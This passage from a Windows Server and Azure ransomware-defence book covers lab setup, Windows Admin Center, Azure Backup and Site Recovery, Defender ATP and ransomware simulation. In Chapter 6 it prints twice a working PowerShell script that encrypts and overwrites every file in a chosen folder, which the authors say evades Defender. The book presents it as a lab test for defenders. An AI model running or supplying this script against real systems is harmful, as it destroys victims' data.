4. Next Download a copy of Windows Server Insider 17079 Microsoft Eval Center. For our lab, we have a drive on our Hyper-V Host F:\ Save the ISO to F:\DCBuild_Insider 5. Copy BigDemo_Insider.PS1 from C:\Post-Install to F:\DCBuild_Insider
6. Open BigDemo_Insider.PS1 with the PowerShell ISE edit lines 425 and 434 putting in Your Product key received with the EVAL Version of Windows Server 2016 Downloaded above 7. Edit line 422 $ServerISO with the actual path and name of your Server ISO 92
https://blogs.windows.com/windowsexperience/2018/01/23/an nouncing-windows-server-insider-preview-build-17079/
Chapter 3 Using BigDemo to Build your Lab
Downloaded which should have been downloaded to something like F:\DCBuild_Insider Save BigDemo_Insider.PS1 8. Open an administrative PowerShell prompt. Run BigDemo_Insider.PS1 For this book we have used the following parameters: WorkingDir: f:\DCBuild_Insider Organization: MVPDays Rockstars Owner: Dave Kawula TimeZone: Mountain Standard Time AdminPassword: P@ssw0rd DomainName: MVPDays.com DomainAdminPassword: 93
Chapter 3 Using BigDemo to Build your Lab
P@ssw0rd VirtualSwitchName: MVPDays_VMM_VSwitch Subnet: 172.16.100. ExtraLabFiles: C:\ 9. It will take approximately 1 hour to build the Lab Environment
With BigDemo you can create a new Lab Environment on demand. This script has built out Active Directory, DHCP, DNS, and the other core infrastructure components required to get started with your lab. 94
Chapter 4 Configuring Windows Admin Center
Chapter 4
Configuring Windows Admin Center In this chapter, we will look at setting up Windows Admin Center in the Lab. We have already installed Windows Admin Center and will start with the basic configurations. For your reference, we used the following PowerShell Function during provisioning to Download and Installed Windows Admin Center to the Management Virtual Machine.
Function Install-WindowsAdminCenter { param ( [string]$VMName, [string]$GuestOSName, [string]$VMPath, [string]$WorkingDir )
#Download Windows Admin Center to c:\post-install
Invoke-Command -VMName $VMName -Credential $domainCred { New-Item -ItemType Directory -Path "c:\Post-Install" -Force:$true | OutNull Write-Output "Downloading Windows Admin Center" #Ping the internet to get things working in the lab ping www.google.com
95
Chapter 4 Configuring Windows Admin Center
Invoke-WebRequest -UseBasicParsing -Uri https://aka.ms/WACDownload -OutFile "c:\Post-Install\WindowsAdminCenter.msi"
Write-Output "Installing Windows Admin Center" Start-Process msiexec.exe -Wait -ArgumentList "/i c:\postinstall\WindowsAdminCenter.msi /qn /L*v log.txt SME_PORT=6516 SSL_CERTIFICATE_OPTION=generate"
}
}
Install Google Chrome and Mozilla FireFox You are probably wondering why we would install Google Chrome and Mozilla Firefox in the lab. The answer is very simple, and in short, it is because Microsoft Edge does not ship with the Server Operating Systems and we cannot configure Windows Admin Center without an alternate browser. Once we have things initially configured, we could easily use Edge from another Windows 10 Desktop.
Instructions
1. Logon to Management01 as Administrator
96
Screenshot (if applicable)
Chapter 4 Configuring Windows Admin Center
2. Download and Install Google Chorme and Mozilla Firefox
Configure Windows Admin Center In the following steps, we will configure Windows Admin Center with the base configurations.
Instructions
Screenshot (if applicable)
1. Logon to Management01 as Administrator 97
Chapter 4 Configuring Windows Admin Center
2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.
4. Logon with Domain Admin Credentials 5. Click on Skip Tour
98
Chapter 4 Configuring Windows Admin Center
6. Click on Management01
7. Verify that Windows Admin Center connects and is working
8.
Configure Azure Integration In these steps, we will configure Microsoft Azure Integration with Windows Admin Center. These steps are required to configure Hybrid Services such as Azure Backup and Azure Site Recovery.
Instructions
Screenshot (if applicable)
99
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01 as Administrator 2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.
4. Logon with Domain Admin Credentials 5. Click on the Settings Wheel in the top right corner of Windows Admin Center 6. Verify that Windows Admin Center connects and is working
100
Chapter 4 Configuring Windows Admin Center
7. Click on Azure option in the Menu. Then Click register.
8. On the Register, the gateway with Azure click Copy Code and click Device Logon
9. On the Device, Logon screen paste the code and click Continue
101
Chapter 4 Configuring Windows Admin Center
10. Sign In with your Azure tenant Credentials
11. Close the Microsoft Azure PowerShell Window as prompted.
12. Select your tenant ID and click Register. If you don’t know what your tenant ID is you can click 102
Chapter 4 Configuring Windows Admin Center
on Azure Active Directory and click Properties. 13. Verify that you see the message successfully registered with Azure Active Directory. 14. Click on Go to Azure AD app Registration
15. On the Azure App Settings Page Click Settings and then click Required Permissions
103
Chapter 4 Configuring Windows Admin Center
16. Click Grant Permissions and click Yes
17. Once completed click the close button in Windows Admin Center.
Configure Azure Backup In these steps, we will test Azure Hybrid integration by setting up Azure Backup on the Management Server.
Instructions
1. Logon to Management01 as Administrator
104
Screenshot (if applicable)
Chapter 4 Configuring Windows Admin Center
2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.
4. Logon with Domain Admin Credentials 5. Click on Mangement01
6. Click on Backup and click on Setup Azure Backup
105
Chapter 4 Configuring Windows Admin Center
7. On the Azure, Backup tab Click on Login and Login
8. On the Setup Azure Backup page click Step 2, Show Details, Change the region to your local region
9. On Step 3 Select c:\ and System State
10. On Step 3 confirm the Backup Schedule
106
Chapter 4 Configuring Windows Admin Center
11. On Step 4 – Enter an Encryption Passphrase
12. Click Apply
13. Wait while your recovery vault is created Note: Windows Admin Center will create a new recovery Vault for each machine that is protected. This is configured this way to avoid throttling of the accounts. 14. Wait until the Azure Backup setup is complete before changing tabs.
107
Chapter 4 Configuring Windows Admin Center
15. Once complete verify the settings. Note: This is a great way to test Windows Admin Center integration.
16. Test the Backup to the Recovery Vault by clicking Backup Now
108
Chapter 4 Configuring Windows Admin Center
17. Choose Files and Folders and click Backup
18. You will notice that a job has kicked off for the backup
109
Chapter 4 Configuring Windows Admin Center
19. You will notice that a job backup is in progress
Verifying Backups locally with the Backup Microsoft Azure Backup Agent We can check the status of our Azure Backups with the local Azure Backup Agent that has been installed from Windows Admin Center.
Instructions
1. Logon to Management01 as Administrator
110
Screenshot (if applicable)
Chapter 4 Configuring Windows Admin Center
2. On the desktop click on Microsoft Azure Backup
3. Verify your backups or jobs in progress locally here
111
Chapter 4 Configuring Windows Admin Center
Configuring Windows Azure Update Management An important part of our Ransomware defense strategy is keeping updated with Windows Updates and Rollups. This can be easily accomplished by integrating Windows Admin Center with Azure Update Management. In the following steps, we will show you how to setup Azure Update Management to keep your servers up to date.
Instructions
1. Logon to Management01 as Administrator 2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.
4. Logon with Domain Admin Credentials
112
Screenshot (if applicable)
Chapter 4 Configuring Windows Admin Center
5. Click on Mangement01
6. Click on Updates and then click on Centrally Manage updates on all your servers by using Azure Update Management (Set up now)
113
Chapter 4 Configuring Windows Admin Center
7. On the Setup Azure Update Management tab, Choose your Subscription. 8. Create a new Resource Group 9. Choose a Region 10. Create a new Log Analytics Workspace 11. Create a new Azure Automation Accounts and click Set Up
114
Chapter 4 Configuring Windows Admin Center
115
Chapter 4 Configuring Windows Admin Center
12. View the progress by checking notification details
13. Once completed you should see a success status message
116
Chapter 4 Configuring Windows Admin Center
14. Once setup is complete click on Manage in Azure
15. You will see your server show up in Azure Update Management
16. Next click on Schule Update Deployment 17. On Name type: Daily Updates
117
Chapter 4 Configuring Windows Admin Center
18. Complete the deployment settings and select Management 01
118
Chapter 4 Configuring Windows Admin Center
19. Once complete you can see that the updates are managed by Azure Updates
Configure Azure Site Recovery An important part of our Ransomware defense strategy is having an update to date Disaster Recovery Solution. In the event of a Ransomware attack, the only option might be recovering to a DR Site like Azure.
Instructions
Screenshot (if applicable)
1. Logon to Management01 as Administrator
119
Chapter 4 Configuring Windows Admin Center
2. Open FireFox and browse to https://localhost:6516 3. Click Advanced and accept the Security Warnings to continue.
4. Logon with Domain Admin Credentials 5. Click on drtitan01
6. Click on Virtual Machines and click on Help Protect your VMs from disasters by using Azure Site Recovery (Set up Now)
120
Chapter 4 Configuring Windows Admin Center
7. ON the Set up host with Azure Site Recovery choose your subscription. 8. Select a Resource Group 9. Create a new Recovery Services Vault and click Set up ASR
121
Chapter 4 Configuring Windows Admin Center
10. Verify the progress
11. Verify the progress
12. On the inventory tab, you can see the Status for Disaster Recovery Change once ready.
122
Chapter 4 Configuring Windows Admin Center
13. Configure Azure Site Recovery protection for FS01. Select FS01 click More and click Protect VM
123
Chapter 4 Configuring Windows Admin Center
14. On the Protect FS01 with Azure Site Recovery, window create a new Storage Account called asrdrtitanstorage 15. Click Protect VM
16.
124
Chapter 4 Configuring Windows Admin Center
Upgrade to Security Center Standard in Azure To start seeing metric and use security center we will need to either start a trial or sign up for Security Center Standard.
Instructions
Screenshot (if applicable)
1. Open you Azure Portal and browse to Security Center, Getting Started, Click on asrransomwarelogs and click Upgrade
2. Once Upgraded you will see the checkmark on Ugpraded 3.
125
Chapter 4 Configuring Windows Admin Center
126
Chapter 5 Windows Defender Advanced Threat Protection ATP
Chapter 5
Windows Defender Advanced Threat Protection ATP Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help protect your Windows Servers. This tool gives the capabilities of Windows Defender that is included with Windows Server 2019.
In this chapter, we will give a brief overview of some of the features. To start things off, you will need to sign up for a trial here: https://www.microsoft.com/enus/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink
127
Chapter 5 Windows Defender Advanced Threat Protection ATP
Onboarding a Server with Windows Defender ATP
Instructions
1. Browse to https://securitycenter.win dows.com/dashboard 2. Log in with your Admin Credentials
128
Screenshot (if applicable)
Chapter 5 Windows Defender Advanced Threat Protection ATP
3. Click on the Settings Wheel, and scroll down to Machine Mangement 4. You will notice that there are many different deployment options from local installation, Group Policy, Configuration Manager, etc. 5. Choose Local Script 6. Download the Deployment Package to the Target Server Management 01 7. Open an Administrative Command Prompt and run WindowsDefenderATPLoc alOnboardingSCript.cmd 8. Wait approximately 5 minutes and check the machines List in the Portal
129
Chapter 5 Windows Defender Advanced Threat Protection ATP
Reviewing an Incident with Windows Defender Advanced Threat Protection
Instructions
1. Browse to https://securitycenter.win dows.com/dashboard 2. Log in with your Admin Credentials
3. Here we can see that our machine Management01 has had Occamy Malware detected. We will look at this attack later in the book.
130
Screenshot (if applicable)
Chapter 5 Windows Defender Advanced Threat Protection ATP
4. If we scroll down on the machine, we can see a timeline of the infection
5. We can also drill into the alert giving more information about the incident
131
Chapter 5 Windows Defender Advanced Threat Protection ATP
6. We can also see an incident Graph
7. We can also drill into the live investigation that took place for this incident
132
Chapter 6 Simulating a Ransomware Attack
Chapter 6
Simulating a Ransomware Attack
KnowBe4 Ransomware Simulator on Windows Server 2019 RanSim will simulate 13 ransomware infection scenarios and 1 crypto mining infection scenario and show you if a workstation is vulnerable.
Instructions
Screenshot (if applicable)
133
Chapter 6 Simulating a Ransomware Attack
1. In Order to initially test the Ransomware Simulator we are going to have to turn off Windows Defender Protection on our Windows Server 2019 machine Management01. If you don’t do this the installation of the Ransomware Simulator will fail.
2. Download the Knowbe4 Ransomware Simulator from https://www.knowbe4.co m/ransomware-simulator 3. Run SimulatorSetup.exe and click install
134
Chapter 6 Simulating a Ransomware Attack
4. Once Setup has completed close the installation window. 5.
6. The files for the installation are located in c:\users\administrator.ms smoa\appdata\ 7. This is where the temp files are stored for testing during the Ransomware tests
135
Chapter 6 Simulating a Ransomware Attack
8. On the KnowBe4 Ransomware Simulator window click launch
136
Chapter 6 Simulating a Ransomware Attack
9. On the KnowBe4 Ransim window click Launch
10. We will launch the attack initially with Defender Disabled and see what happens 11. You will see a test folder get created you don’t see this when Windows Defender is enabled
137
Chapter 6 Simulating a Ransomware Attack
12. You will be able to see the files being encrypted real time in here.
13. We can see that 14/14 scenarios succeeded with Windows Defender Off
138
Chapter 6 Simulating a Ransomware Attack
14. Now let us turn Windows Defender Protection Back on
15. Re-Run the tests this time with protection enabled 16. You can see right away Windows Defender found a problem
139
Chapter 6 Simulating a Ransomware Attack
17. We can see the the Trojan.Win32/Ocamy.C was found
18. One of the things that I noticed when Defender was enabled was that the Ransomware Tool was very slow and unresponsive.
140
Chapter 6 Simulating a Ransomware Attack
19. And we can see that after a long period of time none of these attacks succeeded directly on the server
Enabling Ransomware Protection on Windows Server 2019 A new Feature with Windows Server 2019 is Ransomware Protection. In the following steps, we will re-run the tests with Ransomware Simulator Ransim and see the output.
Instructions
Screenshot (if applicable)
141
Chapter 6 Simulating a Ransomware Attack
1. Open Windows Security and clock on Ransomware Protection 2. Click on manage Ransomware Protection
3. Turn On Controlled Folder access
142
Chapter 6 Simulating a Ransomware Attack
4. Click on Protected Folders to see what folders are protected by default 5. Click on Add Protected Folder and Add C:\Users\Administrator.M MSMOA\appdata\local\R nSimulator
143
Chapter 6 Simulating a Ransomware Attack
6. Re-Run the RanSim tests
7. Right away a new popup showed that Unauthorized Changes Blocked collector.exe from making changes
8. Moreover, we can see that after a longperiod none of these attacks succeeded directly on the server
144
Chapter 6 Simulating a Ransomware Attack
Executing a Ransomware Attack with PowerShell The code below is only to be used for testing purposes. DO Not run this in a production environment. None of the authors of this book take any responsibility for your actions. Windows Defender will not pick this attack up because it was executed with Administrative Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath #global variables $csv = "C:\windows\temp\drives.csv" #Define the cert to use for encryption #Create your own cert with this command; New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local $Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A) $Cert #discover the other folders beneath the selectedpath $FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue $FilestoEncrypt Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C ertificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography" ) } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
145
Chapter 6 Simulating a Ransomware Attack
[Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force } #Encrypt each file foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue } Exit
146
Chapter 6 Simulating a Ransomware Attack
Instructions
1. Open PowerShell ISE and run as Administrator 2. Run this code to select the target folder. We will use one of the sample RanSIm Folders. 3. C:\Users\Administrator.M MSMOA\appdata\local\R nSimulator\TestFolder\Te sts\1-Tests
Screenshot (if applicable)
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath
4. Select the folder and click ok
147
Chapter 6 Simulating a Ransomware Attack
5. Create a new Self Signed Certificate 6. Copy the thumbprint to the clipboard
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
7. Run the following to put the Certificate into the $Cert Variable
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert
8. Then Grab the files from the folder
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue $FilestoEncrypt
9. Run the Encrypt-File Function
Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return }
148
Chapter 6 Simulating a Ransomware Attack
$AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count)
149
Chapter 6 Simulating a Ransomware Attack
$BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }
10. Try Encrypting your files
150
foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue }
Chapter 6 Simulating a Ransomware Attack
11. The Ransomware attack was successful and bypassed Windows Defender, ATP, and Ransomware Protection
12. I renamed one of the files and took the .exe off the end it is indeed encrypted.
151
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Chapter 7
Recovering from Ransomware using Azure Site Recovery Notes from the Field Why Airgapped Replicas are the only choice So what is air gapped backup anyways? Here is what Wikipedia has to say: An air gap, air wall or air gapping is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from unsecured networks, such as the public Internet or an unsecured local area network. It means a computer or network has no network interfaces connected to other networks, with a physical or conceptual air gap, analogous to the air gap used in plumbing to maintain water quality. In lay man’s terms, it means that you must keep a copy of you Backups and replicas offline.
Why Planned Failover is no longer an option Planned Failover is the normal process of failing over to replica recovery points at a different location. What the planned failover process does is the following:
1. Once kicked off it takes a final sync of the source machines 2. Then once replication completes it turns off the Source Virtual Machine 152
Chapter 7 Recovering from Ransomware using Azure Site Recovery
3. At this point, it takes one final sync to capture the remaining changes. This can only be done once the Virtual is off. Think of a SQL Server or Exchange Server that were processing transactions during the 1st sync. The system cannot guarantee all of the records are there until the Virtual Machine is off. That is why it shuts down the source machine to complete the final delta sync. 4. Once the Sync is completed the Virtual Machine is powered on in your Microsoft Azure Tenant.
Why will this not work in a Ransomware Situation? Because if the source machine was infected and the files were encrypted you just too the encrypted files up to Azure and turned on the Virtual Machine.
Failover Now is the only Option With the Planned Failover process not viable for us the only option is to use the Failover Now or Failover option. This will allow us to select a point in time to simply power on the Virtual Machine. 1. The steps to perform Failover Now are easier and faster than a planned failover. First, you choose the Virtual Machine from the Azure Recovery Vault. 2. Next, you select the Failover button 3. Choose the restore point 4. Turn on the VM The total amount of time to turn on an air gapped replica virtual machine is minutes.
Watch you Six (Clock) When dealing with a ransomware incident, nobody is going to have your back. You do not have the luxury of time when it comes to a ransomware attack. If you had configured a maximum of 30 restore points in Azure the clock is ticking. If the source Virtual Machine is still on your Azure 153
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Site Recovery jobs are still bringing the nonviable recovery points into your vault. If you out run the number of restore points and all you have is infected or cryptoed files, then Azure Site Recovery was pointless.
Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN There is a big difference between traditional Disaster Recovery protection and the level of protection that is required to survive a ransomware attack. Think of it this way if you run a live Domain Controller in the cloud like many of us do. What happens when we have a live incident, and the source on-prem side is compromised. Do you think that Azure Virtual Machine running as a domain controller is safe? Earlier in the book, we showed you what an admin level ransomware attack looked like for core infrastructure roles like Domain Controllers. What this means for you is that you must keep tight control and maintain the “Air Gap” between your on-prem infrastructure and the cloud. Once you have safely recovered to a previous recovery point and cleaned up the on-prem side at that point, you will be able to setup a Site-to-Site VPN to give users access.
When can I get back into my data? Oh, do I love the phone calls of people screaming at me wondering when they will be able to get their data back? What they don’t understand is they are lucky that we have any data at all. If you didn’t have an air-gapped backup and dr solution you could be looking at something like this:
Dear CEO, I think it is the time that we notify the public of the breach that has occurred on 04/13/2019. None of our services will be viable for the next foreseeable future. You should look at issuing a public statement and having our teams contact our business partners. Those million dollar shipment of supplies will not be arriving on time. Blah Blah
154
Chapter 7 Recovering from Ransomware using Azure Site Recovery
If you think that this situation doesn’t happen, you are dead wrong. If you ask a room of IT Professionals how many have been impacted by some type of Ransomware attack in the past 3 years most of them would put their hands up.
So, the short answer to the question “When can I get my data back is?” is as soon as we can.
Trust me the on this one point my friends that if you have an option of nothing or a recovery point that is 24 or 48 hours old. The business will be extremely thankful that they have something to keep going. The pain staking process of rekeying data in a Ransomware Attack is something that you won’t be able to overcome. Our first and primary concern is getting them back at all.
Ok, so I didn’t listen and lost everything now what? If you didn’t have an air-gapped solution and you lost everything now what. Well, it because of one giant salvage operation. Starting here: 1. Rebuilding Core Infrastructure Roles a. Active Directory b. DNS c. DHCP 2. Rebuilding all the Workstations 3. Rebuild SQL, Exchange, SharePoint 4. Praying our backups to go back far enough
You are talking about weeks if not months of downtime for some of these services if not all of them. 155
Chapter 7 Recovering from Ransomware using Azure Site Recovery
5. The steps to perform Failover Now are easier and faster than a planned failover. First, you choose the Virtual Machine from the Azure Recovery Vault. 6. Next, you select the Failover button 7. Choose the restore point 8. Turn on the VM The total amount of time to turn on an air gapped replica virtual machine is minutes.
Don’t forget to tune your Replication Policy Your Replication Policy will determine how many recovery points you have available. What does this mean to you the IT PRO our Cloud Admin? It means that this is the amount of time you have to make a decision when a Ransomware attack occurs. If you only have 7 days worth of recovery points in the cloud, it means you have maximum 7 days to make a decision. You cannot take the weekend off if you get a ransomware attack. You must act immediately and make a decision. This nice part about being able to recover in the cloud is you can actually recover offline and not directly connect back to the core infrastructure.
Testing Failover can be a quick Ransomware Fix Using the Test Failover option can be a very quick ransomware fix for your organization. With this option, you can quickly create a portable environment to either get files back or to check the viability of your Azure Site Recovery Points. We often recommend to our clients that they 156
Chapter 7 Recovering from Ransomware using Azure Site Recovery
should be testing their Recovery Points Quarterly. This is safe to do in an offline environment and doesn’t take that long to complete
Reset Settings for your Azure Site Recovery Hyper-V Host Sometimes it can be difficult to add hosts from Windows Admin Center into Asure Site Recovery. The following script will help take care of error messages like this.
157
Chapter 7 Recovering from Ransomware using Azure Site Recovery
158
Chapter 7 Recovering from Ransomware using Azure Site Recovery
To resolve the issue I had to run a Reset Script on the host to wipe all the settings.
pushd . try { $windowsIdentity=[System.Security.Principal.WindowsIdentity]::GetCurrent() $principal=new-object System.Security.Principal.WindowsPrincipal($windowsIdentity) $administrators=[System.Security.Principal.WindowsBuiltInRole]::Administrat or $isAdmin=$principal.IsInRole($administrators) if (!$isAdmin) { "Please run the script as an administrator in elevated mode." $choice = Read-Host return; } $error.Clear() "This script will remove the old Azure Site Recovery Provider related properties. Do you want to continue (Y/N) ?" $choice = Read-Host if (!($choice -eq 'Y' -or $choice -eq 'y')) { "Stopping cleanup." return; } $serviceName = "dra" $service = Get-Service -Name $serviceName
159
Chapter 7 Recovering from Ransomware using Azure Site Recovery
if ($service.Status -eq "Running") { "Stopping the Azure Site Recovery service..." net stop $serviceName } $asrHivePath = "HKLM:\SOFTWARE\Microsoft\Azure Site Recovery" $registrationPath = $asrHivePath + '\Registration' $proxySettingsPath = $asrHivePath + '\ProxySettings' $draIdvalue = 'DraID' $idMgmtCloudContainerId='IdMgmtCloudContainerId'
if (Test-Path $asrHivePath) { if (Test-Path $registrationPath) { "Removing registration related registry keys." Remove-Item -Recurse -Path $registrationPath } if (Test-Path $proxySettingsPath) { "Removing proxy settings" Remove-Item -Recurse -Path $proxySettingsPath } $regNode = Get-ItemProperty -Path $asrHivePath if($regNode.DraID -ne $null) { "Removing DraId" Remove-ItemProperty -Path $asrHivePath -Name $draIdValue } if($regNode.IdMgmtCloudContainerId -ne $null) { "Removing IdMgmtCloudContainerId"
160
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Remove-ItemProperty -Path $asrHivePath -Name $idMgmtCloudContainerId } "Registry keys removed." } # First retrieve all the certificates to be deleted $ASRcerts = Get-ChildItem -Path cert:\localmachine\my | whereobject {$_.friendlyname.startswith('ASR_SRSAUTH_CERT_KEY_CONTAINER') -or $_.friendlyname.startswith('ASR_HYPER_V_HOST_CERT_KEY_CONTAINER')} # Open a cert store object $store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine" ) $store.Open('ReadWrite') # Delete the certs "Removing all related certificates" foreach ($cert in $ASRcerts) { $store.Remove($cert) } }catch { [system.exception] Write-Host "Error occurred" -ForegroundColor "Red" $error[0] Write-Host "FAILED" -ForegroundColor "Red" } popd
161
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Enable Diagnostic Logging for Azure Site Recovery To enable debug logging for the ASR Provider, use the following steps:
Open an elevated PowerShell Window and then run the following commands to create your trace definition: logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y logman update ASRDebug -p "Microsoft-Azure Site RecoveryProvider" 0x8000000000000000 0x5 logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5
Note: The default location specified above is C:\temp. You may safely change this value if needed. The folder will be created if it does not exist. Start the trace by typing the following command in the elevated Windows PowerShell window: logman start ASRDebug
Reproduce your issue. As soon as you reproduce your issue, stop the trace by typing the following command: logman stop ASRDebug
Convert the trace to readable text, type netsh trace convert
Collect debug logs from the folder \Temp. The default location will be C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.
162
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Zero Day time to Failover
Assuming an Admin Level breach Failing over 100 % to Azure In this scenario, we are going to look at an attack that takes place directly on your Domain Controllers. This is the worst case for a Ransomware type attack because the attacker is not looking for an immediate payment they have hacked into your system and are directly executing the attack. Note: This scenario takes place based on real-life events that took place 2 years ago. The client in question had their Admin credentials compromised from an online cloud backup provider. The attackers gained access to the backups and were able to crack the NTDS. Dit (Active Directory Database) offline. Then at their leisure could they come in and out. They executed this sophisticated attack on the customer’s busiest day of the year.
To showcase an attack like this, we are going to use PowerShell with Administrative privileges. You will notice how none of Windows Defenders protection polices catch this. We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain controller. Second, we will take down Active Directory by encrypting the c:\Windows\NTDS folder on each domain controller.
All of these steps were performed in a lab environment. Please do not try any of these steps in production.
Executing a PowerShell based Ransomware Attack on Domain Controllers. 163
Chapter 7 Recovering from Ransomware using Azure Site Recovery
The code below is to only be used for testing purposes. DO Not run this in a production environment. None of the authors of this book take any responsibility for your actions. Windows Defender will not pick this attack up because it was executed with Administrative Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
